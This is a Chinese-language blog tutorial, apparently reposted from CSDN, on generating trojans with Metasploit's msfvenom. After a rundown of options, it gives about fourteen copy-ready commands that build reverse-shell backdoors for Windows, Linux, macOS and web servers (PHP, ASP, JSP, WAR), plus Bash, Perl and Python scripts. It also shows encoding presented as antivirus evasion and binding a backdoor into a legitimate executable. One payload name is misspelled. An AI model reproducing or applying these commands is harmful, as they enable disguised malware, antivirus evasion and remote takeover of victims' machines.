【内网安全】——msf木马生成教程

作者名:白昼安全
主页面链接: 主页传送门
创作初心: 一切为了她
座右铭: 不要让时代的悲哀成为你的悲哀
专研方向: web安全,后渗透技术
每日emo: 钱真的是万能的

一、msfvenom基本使用

1、–p (- -payload-options)

添加载荷payload。

(- -payload-options 列出payload选项)

2、–l

查看所有payload encoder nops。

3. –f (- -help-formats)

输出文件格式。

(- -help-formats 列出所有文件格式)

Executable formats:

asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-net, psh-reflection, psh-cmd, vba, vba
exe, vba-psh, vbs, war

Transform formats:

bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

4、–e

编码免杀。

5、–a (- -platform – -help-platforms)

选择架构平台

x86 | x64 | x86_64

Platforms:

windows, netware, android, java, ruby, linux, cisco, solaris, osx, bsd, openbsd, bsdi, netbsd, freebsd, aix, hpux, irix, unix, php, javascript, python, nodejs, firefox, mainframe

6、–o

文件输出。

7、–s

生成payload的最大长度,就是文件大小。

8、–b

避免使用的字符 例如:不使用 ‘\0f’。

9、–i

编码次数。

10、–c

添加自己的shellcode。

11、–x | -k

捆绑。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。

二、msfvenom使用实例

下面列举一些平时常用的木马生成的案例,如下

1、普通生成

单纯生成一个后门,-p指定payload,-f指定生成的木马格式,-o指定木马保存位置

msfvenom -p < payload > < payload options > -f < format > -o < path > 

msfvenom –p windows/meterpreter/reverse_tcp –f exe –o C:\back.exe 

2、编码处理

使用-e对生成的木马进行编码处理

msfvenom -p < payload > -e < encoder > -i < encoder times > -n < nopsled > -f < format > -o < path > 

msfvenom –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe 

3、捆绑

把后门捆绑到指定程序上,例子如下

Msfvenom –p windows/meterpreter/reverse_tcp –platform windows –a x86 –x C:\nomal.exe –k –f exe –o C:\shell.exe

4、Windows

生成windows木马程序,这里以生成windows反向木马为例(-a选择架构平台)

Msfvenom –platform windows –a x86 –p windows/meterpreter/reverse_tcp –i 3 –e x86/shikata_ga_nai –f exe –o C:\back.exe 

Msfvenom –platform windows –a x86 –p windows/x64/meterpreter/reverse_tcp –f exe –o C:\back.exe 

5、Linux

生成可以控制linux的木马程序(下面的例子中为反向)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f elf > shell.elf 

6、MAC

生成可以控制mac版本的木马程序,,格式如下

msfvenom -p osx/x86/shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f macho > shell.macho 

7、PHP

生成php反弹木马程序

msfvenom -p php/meterpreter_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.php 

8、Asp

生成asp木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f asp > shell.asp 

9、Aspx

生成aspx木马程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f aspx > shell.aspx 

10、JSP

生成jsp木马程序

msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.jsp 

11、War

war格式木马程序

msfvenom -p java/jsp_shell_reverse_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f war > shell.war 

12、Bash

bash脚本格式木马程序

msfvenom -p cmd/unix/reverse_bash LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.sh 

13、Perl

生成pl格式木马程序

msfvenom -p cmd/unix/reverse_perl LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.pl 

14、Python

生成py格式木马程序

msfvenom -p python/meterpreter/reverser_tcp LHOST= < Your IP Address > LPORT= < Your Port to Connect On > -f raw > shell.py 

猜你喜欢

转载自blog.csdn.net/qq_63844103/article/details/128801917